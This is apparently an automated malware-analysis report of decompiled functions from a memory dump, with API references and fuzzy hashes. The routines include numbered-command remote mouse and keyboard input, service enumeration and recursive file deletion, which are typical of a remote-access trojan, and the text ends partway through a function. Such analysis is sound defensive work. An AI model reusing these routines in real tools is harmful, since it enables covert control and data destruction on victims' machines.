						_t170 =  *0x7ab740; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t171 = _t158 + 1;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t159 = _t158 - _t171;
							_t119 = E00781916(_t170, _t158 - _t171 + 1, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E0078D309(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E00776769(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E00776769(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E00776769(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t27 =  &_v12; // 0x78307e
									_t125 =  *_t27;
									if(_t124 == 0) {
										 *((char*)( *((intOrPtr*)(_t125 + 4)))) = 0;
										L44:
										 *(E007828C7()) = _v8;
										_t128 = E007828BB();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t129 = E0078D309(_t161,  *((intOrPtr*)(_t125 + 4)), 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t141 =  *((intOrPtr*)(_t135 + 1));
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t11 =  &_v12; // 0x78307e
								_t137 =  *_t11;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}

0x00782c8e
0x00782c8e
0x00782c98
0x00782c9d
0x00782ca1
0x00782ca3
0x00782cab
0x00782cb6
0x00782e56
0x00782e58
0x00782e59
0x00782e5a
0x00782e5b
0x00782e5c
0x00782e5d
0x00782e62
0x00782e66
0x00782e68
0x00782e6b
0x00782e72
0x00782e79
0x00782e7d
0x00782e80
0x00782e83
0x00782e88
0x00782e89
0x00782e8b
0x00782fb3
0x00782fb3
0x00782fb4
0x00782fb5
0x00782fb6
0x00782fb7
0x00782fb8
0x00782fbd
0x00782fc0
0x00782fc1
0x00782fc9
0x00782fd0
0x00782fd3
0x00782fe0
0x00782fe7
0x00782fe8
0x00782fe9
0x00782fea
0x00782fef
0x00782ffe
0x00783005
0x0078300d
0x0078300f
0x00783019
0x0078301c
0x00783029
0x0078302c
0x0078302e
0x00783047
0x0078304f
0x00783051
0x00783057
0x0078305c
0x00783053
0x00783053
0x00000000
0x00783053
0x00783030
0x00783030
0x00783031
0x00783031
0x00783031
0x0078305e
0x00783011
0x00783011
0x00783011
0x0078306b
0x0078306d
0x0078306f
0x00783071
0x00783081
0x00783081
0x00783073
0x00783073
0x00783076
0x00000000
0x00783078
0x00783078
0x00783079
0x0078307e
0x00783076
0x00783087
0x00783092
0x0078309d
0x00782e91
0x00782e95
0x00782e9a
0x00782e9b
0x00782e9d
0x00000000
0x00782ea3
0x00782ea7
0x00782eac
0x00782ead
0x00782eaf
0x00000000
0x00782eb5
0x00782ebb
0x00782ec0
0x00782ec6
0x00782ecd
0x00782ed3
0x00782ed6
0x00782edc
0x00782ee3
0x00782ee9
0x00782eed
0x00782ef3
0x00782ef6
0x00782efd
0x00782f02
0x00782f02
0x00782f04
0x00782f04
0x00782f07
0x00782f0e
0x00782f26
0x00782f26
0x00782f29
0x00782f10
0x00782f10
0x00782f15
0x00782f17
0x00000000
0x00782f19
0x00782f1b
0x00782f21
0x00782f21
0x00782f17
0x00782f31
0x00782f45
0x00782f4b
0x00782f4d
0x00782f5b
0x00782f5d
0x00782f4f
0x00782f4f
0x00782f52
0x00000000
0x00782f54
0x00782f56
0x00782f56
0x00782f52
0x00782f72
0x00782f79
0x00782f7b
0x00782f8a
0x00782f8d
0x00782f7d
0x00782f7d
0x00782f80
0x00000000
0x00782f82
0x00782f85
0x00782f85
0x00782f80
0x00782f7b
0x00782f97
0x00782fa1
0x00782fa6
0x00782fab
0x00782fb2
0x00782fb2
0x00782eaf
0x00782e9d
0x00782cce
0x00782cce
0x00782cd4
0x00782cd4
0x00782cd9
0x00782d0f
0x00782d10
0x00782d16
0x00782d18
0x00782d1b
0x00782d1b
0x00782d1d
0x00782d1e
0x00782d2f
0x00782d34
0x00782d39
0x00782d43
0x00000000
0x00782d49
0x00782d49
0x00782d4b
0x00782d4c
0x00782d4f
0x00782d4f
0x00782d51
0x00782d52
0x00782d56
0x00782d5e
0x00782d63
0x00782d68
0x00782d70
0x00782d71
0x00782d77
0x00782d7c
0x00782d81
0x00782d87
0x00782d8c
0x00782d8d
0x00782d90
0x00000000
0x00000000
0x00000000
0x00782d90
0x00782d95
0x00782d96
0x00782d9b
0x00782d9d
0x00782d9d
0x00782da5
0x00782dab
0x00782dae
0x00782dae
0x00782db2
0x00000000
0x00000000
0x00782dbc
0x00782dbc
0x00782dbf
0x00782dc2
0x00782dc4
0x00782dd2
0x00782dd4
0x00782dde
0x00782dde
0x00782de0
0x00782de2
0x00000000
0x00000000
0x00782dd9
0x00782ddb
0x00782ddd
0x00782ddd
0x00000000
0x00782ddd
0x00000000
0x00782ddb
0x00782de4
0x00782de7
0x00782de9
0x00782df4
0x00782df6
0x00782e00
0x00782e00
0x00782e02
0x00782e04
0x00000000
0x00000000
0x00782dfb
0x00782dfd
0x00782dff
0x00782dff
0x00000000
0x00782dff
0x00000000
0x00782dfd
0x00782e00
0x00782de7
0x00782e06
0x00782e06
0x00782e08
0x00782e0c
0x00782e0c
0x00782e11
0x00782e13
0x00782e16
0x00782e19
0x00782e1b
0x00782e1b
0x00782e1e
0x00782e39
0x00782e3c
0x00782e44
0x00782e49
0x00782e4e
0x00000000
0x00782e4e
0x00782e20
0x00782e28
0x00782e2d
0x00782e30
0x00782e32
0x00000000
0x00000000
0x00782e34
0x00782d81
0x00000000
0x00782d68
0x00782cdb
0x00782cdb
0x00782cdd
0x00782cdf
0x00782cdf
0x00782ce3
0x00000000
0x00000000
0x00782ce7
0x00782cfb
0x00782cfb
0x00782ce9
0x00782ce9
0x00782cef
0x00000000
0x00782cf1
0x00782cf1
0x00782cf4
0x00782cf9
0x00000000
0x00000000
0x00000000
0x00000000
0x00782cf9
0x00782cef
0x00782d04
0x00782d06
0x00782e55
0x00782e55
0x00782d0c
0x00782d0c
0x00782d0c
0x00000000
0x00782d0c
0x00000000
0x00782d06
0x00782cff
0x00782d01
0x00782d01
0x00000000
0x00782d01
0x00782cd9
0x00000000

APIs

_free.LIBCMT ref: 00782D10
_free.LIBCMT ref: 00782D34
_free.LIBCMT ref: 00782EBB
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0079913C), ref: 00782ECD
WideCharToMultiByte.KERNEL32(00000000,00000000,007AB754,000000FF,00000000,0000003F,00000000,?,?), ref: 00782F45
WideCharToMultiByte.KERNEL32(00000000,00000000,007AB7A8,000000FF,?,0000003F,00000000,?), ref: 00782F72
_free.LIBCMT ref: 00783087

Strings

~0x, xrefs: 00782E1B, 00782D0C, 00782D75
~0x, xrefs: 00782CD4, 00782D58, 00782D72, 00782D9E, 00782DC5, 00782DEA, 00782E22, 00782E6C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: ~0x$~0x
API String ID: 314583886-474245733
Opcode ID: b5f3aa1c106a8dc3ceb1e83052827fb444bbc8b913be80ffe75c71212066610b
Instruction ID: 61fd4029b9e30a5c518dde74fe2c5148a8e738bdeb397e2dd14abcaa07899a37
Opcode Fuzzy Hash: b5f3aa1c106a8dc3ceb1e83052827fb444bbc8b913be80ffe75c71212066610b
Instruction Fuzzy Hash: BDC12C71A80205EFDB20BF78CC49AA9BBB9EF42311F1441AAE55497293E73C8E43C754

Uniqueness

Uniqueness Score: -1.00%

Function 00754F84, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00754F84(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				char* _t79;
				char* _t80;
				char* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr _t90;
				signed int _t101;
				signed int _t109;
				signed int _t118;
				signed int _t136;

				_t136 = __edx;
				_t90 =  *((intOrPtr*)(E00745220(0)));
				E007442A6( &_a8,  &_v32, 1, 0xffffffff);
				if(_t90 != 0x30) {
					__eflags = _t90 - 0x31;
					if(_t90 != 0x31) {
						__eflags = _t90 - 0x32;
						if(_t90 != 0x32) {
							__eflags = _t90 - 0x33;
							if(_t90 != 0x33) {
								__eflags = _t90 - 0x34;
								if(_t90 != 0x34) {
									__eflags = _t90 - 0x35;
									if(_t90 != 0x35) {
										__eflags = _t90 - 0x36;
										if(_t90 == 0x36) {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E00745220(0)));
									_t60 = E00745220(4);
									_t101 =  *0x7abd74; // 0x0
									_v40 =  *_t60;
									E00754E1E( *((intOrPtr*)(0x7abd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
									E00755250(_v44, _v40);
								}
							} else {
								_t65 = E00745220(0);
								_v44 =  *((intOrPtr*)(E00745220(4)));
								_t67 = E00745220(8);
								_t109 =  *0x7abd74; // 0x0
								_v44 =  *_t67;
								E00754E1E( *((intOrPtr*)(0x7abd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
								E007551F4( *_t65, _v48, _v44);
								goto L8;
							}
						} else {
							_t72 = E00745220(0);
							_v40 =  *((intOrPtr*)(E00745220(4)));
							_t74 = E00745220(8);
							_t118 =  *0x7abd74; // 0x0
							_v48 =  *_t74;
							E00754E1E( *((intOrPtr*)(0x7abd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
							E00755198( *_t72, _v44, _v48);
							goto L8;
						}
					} else {
						_t79 = E00745220(4);
						_t80 = E00745220(3);
						_t81 = E00745220(2);
						_t82 = E00745220(0);
						 *_t79 =  *_t80;
						__eflags =  *_t81;
						E00755288( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
						goto L8;
					}
				} else {
					E00745220(0);
					_t85 = E00745220(1);
					E0075459C( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E00745220(2)));
					L8:
				}
				E00741FC7();
				return E00741FC7();
			}

0x00754f84
0x00754fa2
0x00754fa9
0x00754fb1
0x00754ff0
0x00754ff3
0x0075504f
0x00755052
0x007550af
0x007550b2
0x00755110
0x00755113
0x00755161
0x00755164
0x0075516b
0x0075516e
0x00755170
0x00755171
0x00000000
0x00755171
0x00755166
0x00755166
0x00755167
0x00755173
0x0075517a
0x0075517a
0x00755115
0x00755127
0x0075512b
0x00755130
0x00755143
0x0075514c
0x0075515a
0x0075515a
0x007550b4
0x007550b9
0x007550cf
0x007550d7
0x007550dc
0x007550ef
0x007550f8
0x00755108
0x00000000
0x00755108
0x00755054
0x00755059
0x0075506f
0x00755077
0x0075507c
0x0075508f
0x00755098
0x007550a8
0x00000000
0x007550a8
0x00754ff5
0x00754ffb
0x00755008
0x00755015
0x00755022
0x0075502d
0x00755037
0x00755044
0x00000000
0x00755049
0x00754fb3
0x00754fb8
0x00754fc5
0x00754fe6
0x0075510d
0x0075510d
0x00755184
0x00755197

APIs

StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00754FD8
mouse_event.USER32 ref: 0075517A

Part of subcall function 00754E1E: GetSystemMetrics.USER32 ref: 00754E53
Part of subcall function 00754E1E: GetSystemMetrics.USER32 ref: 00754E68

Part of subcall function 00755250: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 0075527C

Strings

4, xrefs: 00755110
6, xrefs: 0075516B
3, xrefs: 007550AF
0, xrefs: 00754FAE
2, xrefs: 0075504F
5, xrefs: 00755161
1, xrefs: 00754FF0

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MetricsSystem$InputSendmouse_event
String ID: 0$1$2$3$4$5$6
API String ID: 1731092567-2737206560
Opcode ID: 9278daa1e3fe5b086163229d588732a7c3837f5a5d98256635f1b14f40f7d047
Instruction ID: 29c8619c04306e43af452b080a7e14c8f15b71db9e875941255aa7014b163207
Opcode Fuzzy Hash: 9278daa1e3fe5b086163229d588732a7c3837f5a5d98256635f1b14f40f7d047
Instruction Fuzzy Hash: B151B1B4604B05DFD704EF20E866BDA77A4EF85310F40490EF952572D2DBB8AA4DCB92

Uniqueness

Uniqueness Score: -1.00%

Function 007560DB, Relevance: 15.2, APIs: 10, Instructions: 226
serviceCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E007560DB(intOrPtr __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _QUERY_SERVICE_CONFIG* _v24;
				void* _v28;
				intOrPtr _v32;
				short** _v36;
				intOrPtr _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				struct _ENUM_SERVICE_STATUS _v172;
				void* __ebx;
				void* __edi;
				struct _ENUM_SERVICE_STATUS* _t87;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				intOrPtr _t198;
				short** _t199;
				int _t201;
				intOrPtr _t202;
				int _t203;

				_t198 = __ecx;
				_v40 = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					E00741F6D(_t133,  &_v88);
					_v12 = 0;
					_v8 = 0;
					_v20 = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E0074331A(_t133, _t198, __eflags,  &_v88);
						E00741EF0();
						L13:
						return _t198;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t201 = _v12;
					_push(_t201);
					_t87 = E007794F6( &_v88);
					_v36 = _t87;
					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
					_t202 = 0;
					_v32 = 0;
					__eflags = _v8;
					if(__eflags <= 0) {
						L11:
						L007794F1(_v36);
						goto L12;
					}
					_t199 = _v36;
					do {
						E00743311(E00744405(_t133,  &_v112, _t199[1], __eflags, E0074427F(_t133,  &_v64, 0x7a59c4)));
						E00741EF0();
						E00741EF0();
						E00743311(E00744405(_t133,  &_v64,  *_t199, __eflags, E0074427F(_t133,  &_v112, 0x7a59c4)));
						E00741EF0();
						E00741EF0();
						_t100 = E0074427F(_t133,  &_v136, 0x7a59c4);
						E00743311(E00743030( &_v64, E0075729F(_t133,  &_v112, _t199[3]), _t100));
						E00741EF0();
						E00741EF0();
						E00741EF0();
						_v16 = _v16 & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t199, 1);
						_v28 = _t107;
						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t203 = _v16;
								_push(_t203);
								_v24 = E007794F6( &_v16);
								_t204 = _v24;
								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
								E00743311(E007430A6(_t133,  &_v136, E0075729F(_t133,  &_v64,  *_v24), _t199, __eflags, 0x7a59c4));
								E00741EF0();
								E00741EF0();
								E00743311(E007430A6(_t133,  &_v136, E0075729F(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x7a59c4));
								E00741EF0();
								E00741EF0();
								E00743311(E007430A6(_t133,  &_v136, E00744405(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0074427F(_t133,  &_v112, 0x7a59c4)), _t199, __eflags, "\n"));
								E00741EF0();
								E00741EF0();
								E00741EF0();
								L007794F1(_t204);
								_t202 = _v32;
							}
						}
						CloseServiceHandle(_v28);
						_t202 = _t202 + 1;
						_t199 =  &(_t199[9]);
						_v32 = _t202;
						__eflags = _t202 - _v8;
					} while (__eflags < 0);
					_t198 = _v40;
					goto L11;
				}
				E0074427F(_t133, _t198, 0x79f724);
				goto L13;
			}

0x007560eb
0x007560ef
0x007560f8
0x007560fc
0x00756112
0x0075611a
0x00756121
0x00756128
0x0075613f
0x00756141
0x0075638a
0x0075638b
0x00756397
0x0075639f
0x007563a4
0x007563ac
0x007563ac
0x0075614d
0x00756152
0x00000000
0x00000000
0x00756158
0x0075615b
0x0075615c
0x00756165
0x00756178
0x0075617e
0x00756180
0x00756183
0x00756186
0x00756381
0x00756384
0x00000000
0x00756389
0x0075618c
0x0075618f
0x007561ad
0x007561b5
0x007561bd
0x007561df
0x007561e7
0x007561ef
0x007561ff
0x0075621f
0x00756227
0x0075622f
0x0075623a
0x0075623f
0x00756248
0x00756251
0x0075625b
0x00756261
0x00756263
0x00756269
0x0075626f
0x00756272
0x00756278
0x0075627b
0x00756282
0x0075628a
0x00756291
0x007562b8
0x007562c3
0x007562cb
0x007562f2
0x007562fd
0x00756305
0x0075633b
0x00756346
0x0075634e
0x00756356
0x0075635c
0x00756361
0x00756364
0x00756272
0x00756368
0x0075636e
0x0075636f
0x00756372
0x00756375
0x00756375
0x0075637e
0x00000000
0x0075637e
0x00756105
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,007ABACC,007AC998), ref: 007560F2
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00755BDC,?), ref: 00756139
GetLastError.KERNEL32(?,007ABACC,007AC998), ref: 00756147
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00755BDC,?), ref: 00756178
OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,007A59C4,00000000,007A59C4,00000000,007A59C4,?,007ABACC,007AC998), ref: 00756248

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EnumOpenServicesStatus$ErrorLastManagerService
String ID:
API String ID: 2247270020-0
Opcode ID: ffe32d0bb88d52ab442ce2f5b6cb22362feaa29d32c7a6cb9364e5299e74a4ae
Instruction ID: 6482323be495bba5e23619f795ebbd0853c6db40048a649e65cef2ac57bb00ef
Opcode Fuzzy Hash: ffe32d0bb88d52ab442ce2f5b6cb22362feaa29d32c7a6cb9364e5299e74a4ae
Instruction Fuzzy Hash: 4A812671D00119EBCF18FBA0DC9AAEEB73AEF14311F508119F91667191EF786A49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00757754, Relevance: 13.6, APIs: 9, Instructions: 147
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00757754(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x7a5918; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E007576DE( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E00757754( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}

0x00757768
0x0075776b
0x0075776d
0x0075776f
0x0075776f
0x00757772
0x00757776
0x00757779
0x00757784
0x00757789
0x00757789
0x0075778d
0x00757790
0x00757795
0x007577a0
0x007577a2
0x007577a4
0x007577aa
0x007577ae
0x007577b0
0x007577b0
0x007577b3
0x007577b7
0x007577ba
0x007577c5
0x007577ca
0x007577ca
0x007577ce
0x007577d1
0x007577d6
0x007577db
0x007577f1
0x007577f6
0x0075793e
0x00000000
0x0075793e
0x007577fc
0x007577fe
0x007577fe
0x00757806
0x00757809
0x00757811
0x00757816
0x0075781a
0x0075782a
0x0075792e
0x00757937
0x00757938
0x00000000
0x00757938
0x00757930
0x00757932
0x00000000
0x00757932
0x0075783d
0x007578be
0x007578be
0x00000000
0x007578be
0x0075783f
0x00757847
0x00757849
0x00757849
0x0075784c
0x0075784f
0x0075785a
0x0075785c
0x0075785f
0x0075785f
0x00757863
0x00757866
0x0075786d
0x00757870
0x0075787e
0x0075787e
0x00757880
0x007578e2
0x007578f0
0x007578f0
0x00757905
0x00000000
0x00757907
0x00757909
0x0075790b
0x0075790b
0x00757913
0x00757916
0x0075791e
0x00000000
0x00757923
0x00757905
0x0075788f
0x00000000
0x00000000
0x0075789c
0x007578a4
0x007578a6
0x007578a6
0x007578ae
0x007578b1
0x007578b9
0x00000000
0x007578c1
0x007578c1
0x007578ca
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,?,?,007AC238), ref: 007577EB
FindNextFileW.KERNEL32(00000000,?,?,?,007AC238), ref: 00757822
RemoveDirectoryW.KERNEL32(?,?,?,007AC238), ref: 0075789C
FindClose.KERNEL32(00000000,?,?,007AC238), ref: 007578CA
RemoveDirectoryW.KERNEL32(?,?,?,007AC238), ref: 007578D3
SetFileAttributesW.KERNEL32(?,00000080,?,?,007AC238), ref: 007578F0
DeleteFileW.KERNEL32(?,?,?,007AC238), ref: 007578FD
GetLastError.KERNEL32(?,?,007AC238), ref: 00757925
FindClose.KERNEL32(00000000,?,?,007AC238), ref: 00757938

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 0957099c42ec4b36a5a998f52efdbbd20efd8012f653b8ef5318a2ccbba507bb
Instruction ID: 0ad3ce23b788e248147510633761d2b2658c34fc53e621828640f61af5413d6a
Opcode Fuzzy Hash: 0957099c42ec4b36a5a998f52efdbbd20efd8012f653b8ef5318a2ccbba507bb
Instruction Fuzzy Hash: 8A5128345042198ACF28DF68E8886FAB375FF54305F4081A9DC0993140FBB96E8ECBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00751205, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479
registrylibraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00751205(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				struct _SECURITY_ATTRIBUTES _v104;
				char _v108;
				void* _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				void* _t88;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				signed int _t105;
				void* _t113;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t127;
				signed short* _t135;
				void* _t137;
				void* _t141;
				void* _t146;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t155;
				signed int _t156;
				intOrPtr* _t158;
				void* _t160;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t181;
				void* _t182;
				long _t185;
				signed short* _t195;
				void* _t205;
				void* _t217;
				void* _t233;
				void* _t247;
				signed int _t258;
				signed int _t313;
				signed int _t323;
				signed int _t326;
				void* _t328;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t339;
				signed int _t340;
				void* _t341;
				signed int _t347;
				signed int _t348;
				void* _t351;
				void* _t352;
				void* _t353;
				void* _t356;
				void* _t361;
				void* _t362;
				void* _t364;
				void* _t365;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t372;
				void* _t374;
				void* _t379;

				_t379 = __eflags;
				_t320 = __edx;
